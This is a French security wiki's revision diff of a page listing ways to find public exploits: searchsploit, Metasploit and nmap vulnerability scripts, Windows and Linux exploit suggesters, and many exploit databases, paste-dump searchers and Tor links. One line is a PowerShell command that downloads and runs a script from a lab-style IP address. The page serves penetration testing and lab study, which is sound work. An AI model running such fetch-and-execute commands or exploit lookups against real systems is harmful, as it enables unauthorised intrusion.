Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
trouver_des_exploits_publique [2019/09/12 16:25] M0N5T3R |
trouver_des_exploits_publique [2023/10/01 22:32] (Version actuelle) M0N5T3R |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
- | [Base de donnée d'Exploits et Vulnerabilités ] | + | FIXME **Le PAD pour proposer une amélioration à cette page :** https://pad.zenk-security.com/p/merci |
+ | |||
+ | |||
+ | ====== [Base de donnée d'Exploits et Vulnerabilités ] ====== | ||
============================= | ============================= | ||
+ | |||
+ | **offline :** | ||
+ | |||
+ | * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns | ||
+ | * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf | ||
+ | * -> git clone https://github.com/offensive-security/exploit-database.git | ||
+ | * -> apt update && apt -y install exploitdb | ||
+ | * -> searchsploit -u #update | ||
+ | * -> searchsploit "linux Kernel"--exclude="(PoC)|/dos/" #Example | ||
+ | * -> searchsploit apache mod_ssl #Other example | ||
+ | * -> searchsploit -m 7618 #Paste the exploit in current directory | ||
+ | * -> searchsploit -p 7618[.c] #Show complete path | ||
+ | * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit | ||
+ | * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result | ||
+ | * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result | ||
+ | * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml | ||
+ | * -> searchsploit -x --nmap resultat.xml | ||
+ | |||
+ | |||
+ | |||
+ | * MSF-Search | ||
+ | * -> msf> search platform:windows port:135 target:XP type:exploit | ||
+ | |||
+ | * Nmap vulners | ||
+ | * -> nmap --script nmap-vulners -sV 127.0.0.1 -p 443 | ||
+ | |||
+ | |||
+ | * Nmap vuln | ||
+ | * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1 | ||
+ | |||
+ | * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. | ||
+ | * -> https://github.com/rasta-mouse/Sherlock | ||
+ | * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns" | ||
+ | * -> attend quelque minutes | ||
+ | |||
+ | |||
+ | * Windows Exploit Suggester | ||
+ | * -> git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester | ||
+ | * -> pip install xlrd --upgrade | ||
+ | * -> apt install python3-xlrd | ||
+ | * -> ./windows-exploit-suggester.py --update | ||
+ | * -> python windows-exploit-suggester.py --database 2020-07-27-mssb.xls --systeminfo sysinfo.txt | ||
+ | |||
+ | |||
+ | |||
+ | * Windows Exploit Suggester - Next Generation (WES-NG) | ||
+ | * -> git clone https://github.com/bitsadmin/wesng.git | ||
+ | * -> python wes.py --update | ||
+ | * -> python wes.py sysinfoTarget.txt | ||
+ | * List only vulnerabilities with exploits, excluding IE, Edge and Flash | ||
+ | * -> wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash | ||
+ | * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash | ||
+ | * Only show vulnerabilities of a certain impact | ||
+ | * -> wes.py systeminfo.txt - -impact "Remote Code Execution" | ||
+ | * -> wes.py systeminfo.txt -i "Remote Code Execution" | ||
+ | * -> wes.py systeminfo.txt -i "Elevation of Privilege" | ||
+ | * Only show vulnerabilities of a certain severity | ||
+ | * -> wes.py systeminfo.txt --severity critical important | ||
+ | * -> wes.py systeminfo.txt -s critical | ||
+ | |||
+ | |||
+ | * Linux Exploit Suggester 2 | ||
+ | * -> git clone https://github.com/jondonas/linux-exploit-suggester-2 | ||
+ | |||
+ | * LES: Linux privilege escalation auditing tool | ||
+ | * -> git clone https://github.com/mzet-/linux-exploit-suggester | ||
+ | |||
+ | |||
+ | |||
+ | **online :** | ||
+ | |||
+ | * https://cn-sec.com/?s=CVE | ||
+ | * https://snyk.io/vuln | ||
+ | * http://www.securityfocus.com/ | ||
+ | * https://www.cvedetails.com/ | ||
* https://www.exploit-db.com/ | * https://www.exploit-db.com/ | ||
* https://www.exploit-db.com/google-hacking-database/ | * https://www.exploit-db.com/google-hacking-database/ | ||
+ | |||
+ | * -> firefox --search "Microsoft Edge site:exploit-db.com" | ||
+ | * -> firefox --search "Microsoft Edge site:exploit-db.com" inurl:exploits intext:remote intitle:Browser | ||
+ | * https://srcincite.io/exploits/ | ||
+ | * https://www.exploitalert.com/ | ||
+ | * https://github.com/qazbnm456/awesome-cve-poc | ||
+ | * https://github.com/yeahhub/awesome-cve-poc | ||
+ | * https://vulners.com/ | ||
* https://sploitus.com/ | * https://sploitus.com/ | ||
* -> https://github.com/rejoinder/sploitus-search | * -> https://github.com/rejoinder/sploitus-search | ||
Ligne 11: | Ligne 98: | ||
* pastebin.com | * pastebin.com | ||
* -> http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html | * -> http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html | ||
- | * https://www.cvedetails.com/ | + | * -> https://pastebeen.com |
- | * https://google/ | + | * -> https://psbdmp.cc/ https://psbdmp.ws/ |
* Tor | * Tor | ||
* -> http://xmh57jrzrnw6insl.onion/ | * -> http://xmh57jrzrnw6insl.onion/ | ||
* -> http://hss3uro2hsxfogfq.onion/ | * -> http://hss3uro2hsxfogfq.onion/ | ||
* -> http://gjobqjj7wyczbqie.onion/ | * -> http://gjobqjj7wyczbqie.onion/ | ||
+ | * -> https://ahmia.fi/ | ||
* https://threatpost.com/ | * https://threatpost.com/ | ||
* https://www.deepdotweb.com/ | * https://www.deepdotweb.com/ | ||
* https://packetstormsecurity.com/ | * https://packetstormsecurity.com/ | ||
- | * https://www.cvedetails.com/ | ||
* http://routerpwn.com/ | * http://routerpwn.com/ | ||
* https://www.rapid7.com/db/ | * https://www.rapid7.com/db/ | ||
- | * http://0day.today/ | + | * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]] |
* https://cve.mitre.org/cve/ | * https://cve.mitre.org/cve/ | ||
* http://www.exploitalert.com | * http://www.exploitalert.com | ||
* http://www.vulnerability-lab.com | * http://www.vulnerability-lab.com | ||
- | * https://packetstormsecurity.com | ||
* https://www.rapid7.com/db/ | * https://www.rapid7.com/db/ | ||
* http://it.0day.today | * http://it.0day.today | ||
Ligne 35: | Ligne 121: | ||
* https://www.kb.cert.org/vuls | * https://www.kb.cert.org/vuls | ||
* https://secunia.com/community/advisories/search/ | * https://secunia.com/community/advisories/search/ | ||
- | * http://www.securityfocus.com/bid | ||
* http://lwn.net/Vulnerabilities/ | * http://lwn.net/Vulnerabilities/ | ||
* https://www.owasp.org/index.php/Category:Vulnerability | * https://www.owasp.org/index.php/Category:Vulnerability | ||
Ligne 43: | Ligne 128: | ||
* http://lab.mediaservice.net | * http://lab.mediaservice.net | ||
* http://www.intelligentexploit.com | * http://www.intelligentexploit.com | ||
- | * https://github.com/yeahhub/awesome-cve-poc | + | * http://osvdb.org/ |
+ | * https://wpvulndb.com/ | ||
+ | * http://repwn.com/wiki.html | ||
+ | * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available. | ||
+ | * https://cveapi.com/ cveapi - free API for CVE data. | ||
+ | * http://securityvulns.com/ | ||
+ | * http://insecure.org/sploits_all.html | ||
+ | * http://zerodayinitiative.com/advisories/published/ | ||
+ | * http://nmrc.org/pub/index.html | ||
+ | * http://oval.mitre.org | ||
- | Write-up : | + | **Finding more information regarding the exploit ** |
- | * https://pentester.land/list-of-bug-bounty-writeups.html | + | * http://www.cvedetails.com |
+ | * http://packetstormsecurity.org/files/cve/[CVE] | ||
+ | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] | ||
+ | * http://www.vulnview.com/cve-details.php?cvename=[CVE] | ||